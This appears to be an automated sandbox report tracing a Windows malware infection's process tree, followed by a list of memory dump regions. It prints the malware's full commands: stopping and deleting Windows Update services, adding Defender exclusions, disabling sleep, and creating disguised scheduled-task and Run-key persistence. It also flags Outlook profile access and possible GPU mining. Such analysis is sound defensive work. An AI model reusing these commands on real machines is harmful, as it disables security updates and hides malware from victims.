    cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

    C:\Windows\System32\sc.exe
      cmd: sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop dosvc
      - Launches sc.exe

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
      - Modifies security service

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }

  C:\Windows\System32\cmd.exe
    cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -hibernate-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -hibernate-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -standby-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -standby-timeout-dc 0

  C:\Windows\SysWOW64\explorer.exe
    cmd: C:\Windows\SysWOW64\explorer.exe

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }

    C:\Windows\system32\schtasks.exe
      cmd: "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC

  C:\Windows\explorer.exe
    cmd: C:\Windows\explorer.exe

  C:\Windows\SysWOW64\explorer.exe
    cmd: C:\Windows\SysWOW64\explorer.exe

  C:\Windows\explorer.exe
    cmd: C:\Windows\explorer.exe

  C:\Users\Admin\AppData\Local\Temp\E048.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\E048.exe
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger

    C:\Windows\system32\dllhost.exe
      cmd: "C:\Windows\system32\dllhost.exe"
      - Accesses Microsoft Outlook profiles
      - Checks processor information in registry
      - outlook_office_path
      - outlook_win_path

    C:\Windows\SysWOW64\WerFault.exe
      cmd: C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 712
      - Program crash

  C:\Windows\SysWOW64\explorer.exe
    cmd: C:\Windows\SysWOW64\explorer.exe

  C:\Windows\SysWOW64\explorer.exe
    cmd: C:\Windows\SysWOW64\explorer.exe

  C:\Windows\SysWOW64\explorer.exe
    cmd: C:\Windows\SysWOW64\explorer.exe

  C:\Windows\explorer.exe
    cmd: C:\Windows\explorer.exe

  C:\Users\Admin\AppData\Local\Temp\F2E7.exe
    cmd: C:\Users\Admin\AppData\Local\Temp\F2E7.exe
    - Executes dropped EXE
    - Suspicious use of SetThreadContext

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      cmd: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      - Loads dropped DLL
      - Checks processor information in registry

      C:\ProgramData\72993574041601362566.exe
        cmd: "C:\ProgramData\72993574041601362566.exe"
        - Executes dropped EXE

        C:\Windows\system32\cmd.exe
          cmd: C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\72993574041601362566.exe

          C:\Windows\system32\choice.exe
            cmd: choice /C Y /N /D Y /T 0

      C:\ProgramData\60711744363166210615.exe
        cmd: "C:\ProgramData\60711744363166210615.exe"
        - Executes dropped EXE
        - Adds Run key to start application

        C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
          cmd: C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
          - Executes dropped EXE

      C:\Windows\SysWOW64\cmd.exe
        cmd: "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" & exit

        C:\Windows\SysWOW64\timeout.exe
          cmd: timeout /t 6
          - Delays execution with timeout.exe

  C:\Windows\SysWOW64\explorer.exe
    cmd: C:\Windows\SysWOW64\explorer.exe

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

  C:\Windows\System32\cmd.exe
    cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

    C:\Windows\System32\sc.exe
      cmd: sc stop UsoSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop WaaSMedicSvc
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop wuauserv
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop bits
      - Launches sc.exe

    C:\Windows\System32\sc.exe
      cmd: sc stop dosvc
      - Launches sc.exe

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f

    C:\Windows\System32\reg.exe
      cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

  C:\Windows\System32\cmd.exe
    cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -hibernate-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -hibernate-timeout-dc 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -standby-timeout-ac 0

    C:\Windows\System32\powercfg.exe
      cmd: powercfg /x -standby-timeout-dc 0

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS

  C:\Windows\System32\conhost.exe
    cmd: C:\Windows\System32\conhost.exe zuhwtyqtfkk
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE

  C:\Windows\System32\cmd.exe
    cmd: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    - Drops file in Program Files directory

    C:\Windows\System32\Wbem\WMIC.exe
      cmd: wmic PATH Win32_VideoController GET Name, VideoProcessor

  C:\Windows\System32\cmd.exe
    cmd: C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
    - Drops file in Program Files directory

  C:\Windows\System32\conhost.exe
    cmd: C:\Windows\System32\conhost.exe ozascextlcafxrlv
    - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4520 -ip 4520

C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3676 -ip 3676

C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3796 -ip 3796

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  cmd: C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  - Executes dropped EXE

  C:\Windows\SysWOW64\schtasks.exe
    cmd: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
    - Creates scheduled task(s)

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
  cmd: C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
  - Executes dropped EXE

C:\Program Files\Notepad\Chrome\updater.exe
  cmd: "C:\Program Files\Notepad\Chrome\updater.exe"
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Program Files directory

C:\Windows\system32\WerFault.exe
  cmd: C:\Windows\system32\WerFault.exe -pss -s 532 -p 1460 -ip 1460
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5064 -ip 50641⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\wjtaraiC:\Users\Admin\AppData\Roaming\wjtarai1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\ibtaraiC:\Users\Admin\AppData\Roaming\ibtarai1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3844 -ip 38441⤵
-
C:\Users\Admin\AppData\Roaming\rgtaraiC:\Users\Admin\AppData\Roaming\rgtarai1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 3402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5080 -ip 50801⤵
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
536KB
-
memory/1116-165-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1116-167-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1116-174-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1116-193-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1116-163-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1128-346-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-351-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-353-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-356-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-358-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-360-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-362-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-364-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-1135-0x0000000005350000-0x0000000005968000-memory.dmpFilesize
6.1MB
-
memory/1128-1136-0x0000000005A10000-0x0000000005A22000-memory.dmpFilesize
72KB
-
memory/1128-1137-0x0000000005A30000-0x0000000005B3A000-memory.dmpFilesize
1.0MB
-
memory/1128-1140-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-1141-0x0000000005B40000-0x0000000005B7C000-memory.dmpFilesize
240KB
-
memory/1128-1142-0x00000000061E0000-0x0000000006200000-memory.dmpFilesize
128KB
-
memory/1128-1143-0x0000000006240000-0x00000000062A6000-memory.dmpFilesize
408KB
-
memory/1128-1144-0x0000000006D70000-0x0000000006DB2000-memory.dmpFilesize
264KB
-
memory/1128-1145-0x0000000006DC0000-0x0000000006E52000-memory.dmpFilesize
584KB
-
memory/1128-1146-0x0000000006FE0000-0x0000000007056000-memory.dmpFilesize
472KB
-
memory/1128-1147-0x0000000006E80000-0x0000000006E9E000-memory.dmpFilesize
120KB
-
memory/1128-1148-0x0000000007200000-0x00000000073C2000-memory.dmpFilesize
1.8MB
-
memory/1128-1149-0x00000000073D0000-0x00000000078FC000-memory.dmpFilesize
5.2MB
-
memory/1128-1150-0x0000000007E60000-0x0000000007EB0000-memory.dmpFilesize
320KB
-
memory/1128-1154-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-350-0x00000000009C0000-0x0000000000A22000-memory.dmpFilesize
392KB
-
memory/1128-352-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-355-0x00000000026C0000-0x00000000026D0000-memory.dmpFilesize
64KB
-
memory/1128-348-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-342-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-344-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-341-0x00000000052C0000-0x0000000005312000-memory.dmpFilesize
328KB
-
memory/1128-340-0x0000000004D10000-0x00000000052B4000-memory.dmpFilesize
5.6MB
-
memory/1500-150-0x0000000000400000-0x0000000002B71000-memory.dmpFilesize
39.4MB
-
memory/1500-134-0x0000000002D00000-0x0000000002D09000-memory.dmpFilesize
36KB
-
memory/2192-1266-0x000002B777730000-0x000002B777740000-memory.dmpFilesize
64KB
-
memory/2440-1265-0x000002B777730000-0x000002B777740000-memory.dmpFilesize
64KB
-
memory/2440-1264-0x000002B777730000-0x000002B777740000-memory.dmpFilesize
64KB
-
memory/2904-1162-0x00000000009D0000-0x0000000000A3B000-memory.dmpFilesize
428KB
-
memory/2972-136-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-135-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-143-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-145-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-146-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-142-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-137-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-147-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-141-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/2972-144-0x00000253BED10000-0x00000253BED11000-memory.dmpFilesize
4KB
-
memory/3048-252-0x0000000000EC0000-0x0000000001350000-memory.dmpFilesize
4.6MB
-
memory/3172-148-0x0000000002860000-0x0000000002876000-memory.dmpFilesize
88KB
-
memory/3172-209-0x00000000029C0000-0x00000000029D6000-memory.dmpFilesize
88KB
-
memory/3172-248-0x0000000007F60000-0x0000000007F76000-memory.dmpFilesize
88KB
-
memory/3328-1205-0x0000000002570000-0x00000000025A6000-memory.dmpFilesize
216KB
-
memory/3328-1251-0x0000000006630000-0x000000000664A000-memory.dmpFilesize
104KB
-
memory/3328-1243-0x0000000002700000-0x0000000002710000-memory.dmpFilesize
64KB
-
memory/3328-1208-0x0000000004E30000-0x0000000004EB6000-memory.dmpFilesize
536KB
-
memory/3328-1207-0x00000000050C0000-0x00000000056E8000-memory.dmpFilesize
6.2MB
-
memory/3328-1234-0x0000000005750000-0x0000000005760000-memory.dmpFilesize
64KB
-
memory/3328-1250-0x00000000078D0000-0x0000000007F4A000-memory.dmpFilesize
6.5MB
-
memory/3328-1209-0x00000000056F0000-0x0000000005712000-memory.dmpFilesize
136KB
-
memory/3328-1236-0x0000000006080000-0x000000000609E000-memory.dmpFilesize
120KB
-
memory/3328-1226-0x0000000002700000-0x0000000002710000-memory.dmpFilesize
64KB
-
memory/3328-1219-0x0000000002700000-0x0000000002710000-memory.dmpFilesize
64KB
-
memory/3328-1220-0x0000000005790000-0x00000000057F6000-memory.dmpFilesize
408KB
-
memory/3396-250-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3676-230-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/3676-231-0x0000000000860000-0x0000000000869000-memory.dmpFilesize
36KB
-
memory/3696-216-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-218-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-208-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-207-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-206-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-199-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-198-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-219-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-240-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3696-316-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/3796-310-0x0000000006700000-0x0000000006804000-memory.dmpFilesize
1.0MB
-
memory/3972-1231-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/3972-1246-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/3972-1240-0x0000021B36B20000-0x0000021B36B6A000-memory.dmpFilesize
296KB
-
memory/3972-1237-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/3972-1233-0x0000021B367F0000-0x0000021B36800000-memory.dmpFilesize
64KB
-
memory/4092-297-0x0000000003380000-0x00000000034F3000-memory.dmpFilesize
1.4MB
-
memory/4092-298-0x0000000003500000-0x0000000003634000-memory.dmpFilesize
1.2MB
-
memory/4092-319-0x0000000003500000-0x0000000003634000-memory.dmpFilesize
1.2MB
-
memory/4496-166-0x0000000004970000-0x0000000004A8B000-memory.dmpFilesize
1.1MB
-
memory/4520-191-0x0000000000400000-0x0000000000704000-memory.dmpFilesize
3.0MB
-
memory/4712-1186-0x00000150F21E0000-0x00000150F21F0000-memory.dmpFilesize
64KB
-
memory/4712-1185-0x00000150F21E0000-0x00000150F21F0000-memory.dmpFilesize
64KB
-
memory/4996-318-0x00007FF703AA0000-0x00007FF703E5D000-memory.dmpFilesize
3.7MB